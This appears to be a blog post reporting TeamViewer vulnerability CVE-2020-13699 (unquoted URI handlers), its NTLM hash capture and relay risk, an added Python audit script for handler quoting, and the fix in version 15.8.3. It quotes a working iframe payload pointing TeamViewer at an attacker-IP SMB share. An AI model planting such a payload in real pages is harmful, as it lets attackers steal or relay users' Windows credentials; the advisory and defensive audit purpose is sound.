There was a vulnerability in older versions of the TeamViewer remote access software. This allowed third parties to establish a connection to the respective PC unnoticed. The vulnerability has been fixed by a patch.
The vulnerability CVE-2020-13699
Vulnerability CVE-2020-13699 affected TeamViewer Desktop for Windows up to version 15.8.2, which did not correctly quote its custom URI handlers. A malicious website could start TeamViewer with arbitrary parameters, such as:
teamviewer10: --play URL
This allowed an attacker to force a victim to send an NTLM authentication request and either forward the request or capture the hash for offline password cracking. The discoverer of the vulnerability describes it here as follows.
An attacker could embed a malicious iframe in a website with a crafted URL:
<iframe src="teamviewer10: --play \\attacker-IP\share\fake.tvs">
that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).
This could be used in watering hole attacks to connect unnoticed, as you can read here. Not even a password is required. However, so far there is no indication that the vulnerability is being exploited.
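The quoting flaw described above can be checked for in any registered URI handler command. The following is an added example, not code from the original article or from TeamViewer: it flags command templates whose %1 placeholder is unquoted and shows how such a template splits a URI into separate program arguments. The "demo" schemes, paths and host name are constructed, and the argument splitter is a simplification of Windows command-line parsing.

```python
# Constructed command templates in the form Windows stores under
# HKEY_CLASSES_ROOT\<scheme>\shell\open\command. The "demo" schemes and
# paths are hypothetical, not TeamViewer's actual registry values.
SAMPLE_HANDLERS = {
    "demo-unquoted": r'"C:\Apps\Viewer\viewer.exe" %1',
    "demo-quoted": r'"C:\Apps\Viewer\viewer.exe" "%1"',
}
# URI shaped like the one quoted above, with a placeholder host name.
SAMPLE_URI = r"demo: --play \\fileserver.example\share\fake.tvs"

def split_args(cmdline):
    """Simplified Windows-style split: whitespace separates arguments
    unless inside double quotes (backslash-escaped quotes not modelled)."""
    args, cur, in_quotes, started = [], "", False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes, started = not in_quotes, True
        elif ch in " \t" and not in_quotes:
            if started:
                args.append(cur)
            cur, started = "", False
        else:
            cur, started = cur + ch, True
    if started:
        args.append(cur)
    return args

def placeholder_is_quoted(template):
    """True only if every %1 in the template sits inside double quotes."""
    in_quotes = False
    for i, ch in enumerate(template):
        if ch == '"':
            in_quotes = not in_quotes
        elif template.startswith("%1", i) and not in_quotes:
            return False
    return True

def launch_argv(template, uri):
    """Arguments the handler receives after the URI replaces %1."""
    return split_args(template.replace("%1", uri))

def audit(handlers):
    """Scheme names whose command template leaves %1 unquoted."""
    return sorted(s for s, t in handlers.items() if not placeholder_is_quoted(t))

if __name__ == "__main__":
    for scheme, template in SAMPLE_HANDLERS.items():
        print(scheme, launch_argv(template, SAMPLE_URI))
    print("unquoted handlers:", audit(SAMPLE_HANDLERS))
```

With the unquoted template the program receives --play and the UNC path as separate arguments of its own; with the quoted template the whole URI arrives as a single argument.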
Update to TeamViewer version 15.8.3
Through Bleeping Computer I noticed here that there was an update of TeamViewer to version 15.8.3, which closes the vulnerability. However, the vendor announced the update in this community post about 2 weeks ago.
Statement on CVE 2020-13699
Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.
We implemented some improvements in URI handling relating to CVE 2020-13699.
The changes can be found in the changelog.